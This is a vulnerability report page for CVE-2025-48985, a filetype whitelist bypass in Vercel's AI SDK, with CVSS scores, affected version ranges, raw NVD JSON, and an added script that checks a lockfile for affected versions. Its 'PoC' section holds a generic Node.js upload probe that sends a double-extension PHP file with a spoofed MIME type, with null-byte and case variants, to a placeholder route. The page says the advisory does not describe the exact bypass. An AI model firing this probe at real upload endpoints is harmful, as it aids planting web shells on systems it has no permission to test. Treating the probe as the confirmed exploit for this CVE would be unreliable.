Security Vulnerability Report
CVE-2025-48985 CVSS 3.7 LOW

Published: 2025-11-07 01:15:37
Last Modified: 2026-02-04 21:11:12

Description

A vulnerability in Vercel’s AI SDK has been fixed in versions 5.0.52, 5.1.0-beta.9, and 6.0.0-beta. This issue may have allowed users to bypass filetype whitelists when uploading files. All users are encouraged to upgrade. More details: https://vercel.com/changelog/cve-2025-48985-input-validation-bypass-on-ai-sdk

CVSS Details

Two CVSS v3.1 scores are recorded for this CVE (both appear in the raw NVD data below). They share every metric except Attack Complexity, which is why the headline figure depends on which record a scanner reads.

CNA-supplied score (type Secondary)
CVSS Score
3.7
Severity
LOW
CVSS Vector
CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:N/I:L/A:N
Exploitability 2.2, Impact 1.4

NVD analyst score (type Primary)
CVSS Score
5.3
Severity
MEDIUM
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:N
Exploitability 3.9, Impact 1.4

Common to both: reachable over the network, no privileges or user interaction required, scope unchanged, low integrity impact only (a file type restriction can be bypassed), no confidentiality or availability impact. Weakness classification: CWE-20 (Improper Input Validation).

Configurations (Affected Products)

NVD CPE match criteria (from the raw JSON below; all marked vulnerable):

cpe:2.3:a:vercel:ai:*:*:*:*:*:*:*:* - VULNERABLE (versionEndExcluding 5.0.52)
cpe:2.3:a:vercel:ai:5.1.0:beta0:*:*:*:*:*:* - VULNERABLE
cpe:2.3:a:vercel:ai:5.1.0:beta1:*:*:*:*:*:* - VULNERABLE
cpe:2.3:a:vercel:ai:5.1.0:beta2:*:*:*:*:*:* - VULNERABLE
cpe:2.3:a:vercel:ai:5.1.0:beta3:*:*:*:*:*:* - VULNERABLE
cpe:2.3:a:vercel:ai:5.1.0:beta4:*:*:*:*:*:* - VULNERABLE
cpe:2.3:a:vercel:ai:5.1.0:beta5:*:*:*:*:*:* - VULNERABLE
cpe:2.3:a:vercel:ai:5.1.0:beta6:*:*:*:*:*:* - VULNERABLE
cpe:2.3:a:vercel:ai:5.1.0:beta7:*:*:*:*:*:* - VULNERABLE
cpe:2.3:a:vercel:ai:5.1.0:beta8:*:*:*:*:*:* - VULNERABLE

In version-range terms (npm package `ai`):

Vercel AI SDK < 5.0.52 (fixed in 5.0.52)
Vercel AI SDK 5.1.0-beta.0 through 5.1.0-beta.8 (fixed in 5.1.0-beta.9)
Vercel AI SDK 6.0.0 pre-release line: the vendor description lists 6.0.0-beta among the fixed versions; NVD records no CPE match for this line.
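The ranges above are easy to misread when pre-release tags are involved (5.1.0-beta.3 sorts below 5.1.0 but above 5.0.52, so a plain "< 5.0.52" check misses it). The following is an added example, not code from NVD or from the AI SDK, that turns the two affected ranges on this page into a check you can run against a parsed package-lock.json. It uses no third-party packages; the semver comparison is a minimal implementation written for this example, and the lockfile fragment at the bottom is constructed, not taken from a real project.

```javascript
// Added example (not part of the NVD record or the AI SDK): decide whether an
// installed `ai` package version is inside the affected ranges listed on this page:
//   - any version below 5.0.52 (versionEndExcluding 5.0.52)
//   - 5.1.0-beta.0 through 5.1.0-beta.8 (the fix is 5.1.0-beta.9)
// Everything else (5.0.52+, 5.1.0-beta.9+, 5.1.0, 6.x) is treated as not affected.

function parseVersion(v) {
  const m = /^v?(\d+)\.(\d+)\.(\d+)(?:-([0-9A-Za-z.-]+))?(?:\+[0-9A-Za-z.-]+)?$/.exec(String(v).trim());
  if (!m) throw new Error(`not a semver version: ${v}`);
  return {
    major: Number(m[1]),
    minor: Number(m[2]),
    patch: Number(m[3]),
    // "beta.3" -> ["beta", 3]; purely numeric identifiers become numbers
    pre: m[4] ? m[4].split('.').map((p) => (/^\d+$/.test(p) ? Number(p) : p)) : [],
  };
}

// Returns -1, 0 or 1 following semver precedence: core numbers first, then
// pre-release identifiers; a tagged version ranks below its untagged core.
function compareVersions(a, b) {
  const pa = parseVersion(a);
  const pb = parseVersion(b);
  for (const k of ['major', 'minor', 'patch']) {
    if (pa[k] !== pb[k]) return pa[k] < pb[k] ? -1 : 1;
  }
  if (pa.pre.length === 0 && pb.pre.length === 0) return 0;
  if (pa.pre.length === 0) return 1;
  if (pb.pre.length === 0) return -1;
  const n = Math.max(pa.pre.length, pb.pre.length);
  for (let i = 0; i < n; i++) {
    if (i >= pa.pre.length) return -1; // shorter identifier list sorts first
    if (i >= pb.pre.length) return 1;
    const x = pa.pre[i];
    const y = pb.pre[i];
    if (x === y) continue;
    if (typeof x === 'number' && typeof y === 'number') return x < y ? -1 : 1;
    if (typeof x === 'number') return -1; // numeric sorts before alphanumeric
    if (typeof y === 'number') return 1;
    return x < y ? -1 : 1;
  }
  return 0;
}

function isAffectedByCve202548985(version) {
  // Range 1: everything below 5.0.52, pre-releases of 5.0.52 included.
  if (compareVersions(version, '5.0.52') < 0) return true;
  // Range 2: the 5.1.0 beta line up to and including beta.8.
  const p = parseVersion(version);
  return (
    p.major === 5 && p.minor === 1 && p.patch === 0 &&
    p.pre.length === 2 && p.pre[0] === 'beta' &&
    typeof p.pre[1] === 'number' && p.pre[1] <= 8
  );
}

// Looks up the `ai` package in a parsed package-lock.json (lockfileVersion 2 or 3,
// where installed packages are keyed by their node_modules path).
function auditLockfile(lock) {
  const entry = lock.packages && lock.packages['node_modules/ai'];
  if (!entry || !entry.version) return { found: false };
  return { found: true, version: entry.version, affected: isAffectedByCve202548985(entry.version) };
}

// Constructed sample lockfile fragment so the block runs stand-alone; not a real project.
const SAMPLE_LOCK = {
  name: 'demo-app',
  lockfileVersion: 3,
  packages: {
    '': { name: 'demo-app', dependencies: { ai: '^5.0.0' } },
    'node_modules/ai': { version: '5.0.51' },
  },
};

console.log(auditLockfile(SAMPLE_LOCK)); // { found: true, version: '5.0.51', affected: true }
```

To use it on a real tree, replace SAMPLE_LOCK with `JSON.parse(fs.readFileSync('package-lock.json', 'utf8'))`; for nested copies of `ai` (a key such as `node_modules/some-lib/node_modules/ai`) iterate over `lock.packages` and apply the same check to every key ending in `/ai`.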

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only. It is a generic Node.js multipart-upload probe: the advisory text on this page does not name an upload route or describe the exact bypass, so the endpoint path (/api/upload), the form field name (file) and the filenames are placeholders to be adapted to the application under test.
javascript
// CVE-2025-48985 PoC - File Type Whitelist Bypass in Vercel AI SDK
// This PoC demonstrates how an attacker could bypass file type restrictions
// Dependencies: npm install axios form-data
const axios = require('axios');
const FormData = require('form-data');
const fs = require('fs');

async function exploitCVE202548985(targetUrl, maliciousFile) {
  const form = new FormData();

  // Attempt to bypass file type whitelist using extension manipulation
  // Technique 1: Double extension bypass
  form.append('file', fs.createReadStream(maliciousFile), {
    filename: 'malicious.php.jpg', // Bypass with double extension
    contentType: 'image/jpeg'      // Spoof MIME type
  });

  // Technique 2: Null byte injection (if applicable)
  // form.append('file', fs.createReadStream(maliciousFile), {
  //   filename: 'malicious.php\x00.jpg',
  // });

  // Technique 3: Case manipulation
  // form.append('file', fs.createReadStream(maliciousFile), {
  //   filename: 'malicious.PHP',
  // });

  try {
    // '/api/upload' is a placeholder: the advisory names no endpoint,
    // so point this at whatever upload route the target application exposes.
    const response = await axios.post(targetUrl + '/api/upload', form, {
      headers: {
        ...form.getHeaders(),
      },
      timeout: 10000
    });
    console.log('Upload Response:', response.data);
    console.log('Status:', response.status);
    return response.data;
  } catch (error) {
    if (error.response) {
      console.log('Error Response:', error.response.data);
      console.log('Status Code:', error.response.status);
    } else {
      console.log('Request Error:', error.message);
    }
    return null;
  }
}

// Usage example
// exploitCVE202548985('https://target-ai-app.vercel.app', './malicious.php');
module.exports = { exploitCVE202548985 };

References

https://github.com/vercel/ai/commit/930399bb9839a8baf3d349614106d78268775eed (Patch)
https://vercel.com/changelog/cve-2025-48985-input-validation-bypass-on-ai-sdk (Vendor Advisory)

Raw JSON Data

JSON
{
  "cve": {
    "id": "CVE-2025-48985",
    "sourceIdentifier": "[email protected]",
    "published": "2025-11-07T01:15:36.567",
    "lastModified": "2026-02-04T21:11:11.667",
    "vulnStatus": "Analyzed",
    "cveTags": [],
    "descriptions": [
      {
        "lang": "en",
        "value": "A vulnerability in Vercel’s AI SDK has been fixed in versions 5.0.52, 5.1.0-beta.9, and 6.0.0-beta. This issue may have allowed users to bypass filetype whitelists when uploading files. All users are encouraged to upgrade.\r\n\r\nMore details: https://vercel.com/changelog/cve-2025-48985-input-validation-bypass-on-ai-sdk"
      }
    ],
    "metrics": {
      "cvssMetricV31": [
        {
          "source": "[email protected]",
          "type": "Secondary",
          "cvssData": {
            "version": "3.1",
            "vectorString": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:N/I:L/A:N",
            "baseScore": 3.7,
            "baseSeverity": "LOW",
            "attackVector": "NETWORK",
            "attackComplexity": "HIGH",
            "privilegesRequired": "NONE",
            "userInteraction": "NONE",
            "scope": "UNCHANGED",
            "confidentialityImpact": "NONE",
            "integrityImpact": "LOW",
            "availabilityImpact": "NONE"
          },
          "exploitabilityScore": 2.2,
          "impactScore": 1.4
        },
        {
          "source": "[email protected]",
          "type": "Primary",
          "cvssData": {
            "version": "3.1",
            "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:N",
            "baseScore": 5.3,
            "baseSeverity": "MEDIUM",
            "attackVector": "NETWORK",
            "attackComplexity": "LOW",
            "privilegesRequired": "NONE",
            "userInteraction": "NONE",
            "scope": "UNCHANGED",
            "confidentialityImpact": "NONE",
            "integrityImpact": "LOW",
            "availabilityImpact": "NONE"
          },
          "exploitabilityScore": 3.9,
          "impactScore": 1.4
        }
      ]
    },
    "weaknesses": [
      {
        "source": "134c704f-9b21-4f2e-91b3-4a467353bcc0",
        "type": "Secondary",
        "description": [
          { "lang": "en", "value": "CWE-20" }
        ]
      }
    ],
    "configurations": [
      {
        "nodes": [
          {
            "operator": "OR",
            "negate": false,
            "cpeMatch": [
              { "vulnerable": true, "criteria": "cpe:2.3:a:vercel:ai:*:*:*:*:*:*:*:*", "versionEndExcluding": "5.0.52", "matchCriteriaId": "4A47352A-21CC-43DD-BBCB-64B24A03746D" },
              { "vulnerable": true, "criteria": "cpe:2.3:a:vercel:ai:5.1.0:beta0:*:*:*:*:*:*", "matchCriteriaId": "FDD78D08-7B1C-4405-8B34-8189DFCCB746" },
              { "vulnerable": true, "criteria": "cpe:2.3:a:vercel:ai:5.1.0:beta1:*:*:*:*:*:*", "matchCriteriaId": "A1E07AF8-66E6-4039-9087-2DEC1B5952B7" },
              { "vulnerable": true, "criteria": "cpe:2.3:a:vercel:ai:5.1.0:beta2:*:*:*:*:*:*", "matchCriteriaId": "AE57A66D-F2AC-48B6-A1EF-9583BD2AB9B2" },
              { "vulnerable": true, "criteria": "cpe:2.3:a:vercel:ai:5.1.0:beta3:*:*:*:*:*:*", "matchCriteriaId": "3D89727F-B1B0-483F-9209-C8BC95CE4163" },
              { "vulnerable": true, "criteria": "cpe:2.3:a:vercel:ai:5.1.0:beta4:*:*:*:*:*:*", "matchCriteriaId": "DF1C6D8C-2115-4C06-B2B0-C70350D0598D" },
              { "vulnerable": true, "criteria": "cpe:2.3:a:vercel:ai:5.1.0:beta5:*:*:*:*:*:*", "matchCriteriaId": "AE7D4CFF-AE7D-43F2-9092-FC1A12B2A3A9" },
              { "vulnerable": true, "criteria": "cpe:2.3:a:vercel:ai:5.1.0:beta6:*:*:*:*:*:*", "matchCriteriaId": "4D71DE70-9F13-4EA5-A10B-E401A55BC1B9" },
              { "vulnerable": true, "criteria": "cpe:2.3:a:vercel:ai:5.1.0:beta7:*:*:*:*:*:*", "matchCriteriaId": "573DE1B3-EEF1-4125-9986-13BA19D8BBC9" },
              { "vulnerable": true, "criteria": "cpe:2.3:a:vercel:ai:5.1.0:beta8:*:*:*:*:*:*", "matchCriteriaId": "BC9D7BBB-05A3-407D-8B0E-30904B735BD1" }
            ]
          }
        ]
      }
    ],
    "references": [
      { "url": "https://github.com/vercel/ai/commit/930399bb9839a8baf3d349614106d78268775eed", "source": "[email protected]", "tags": ["Patch"] },
      { "url": "https://vercel.com/changelog/cve-2025-48985-input-validation-bypass-on-ai-sdk", "source": "[email protected]", "tags": ["Vendor Advisory"] }
    ]
  }
}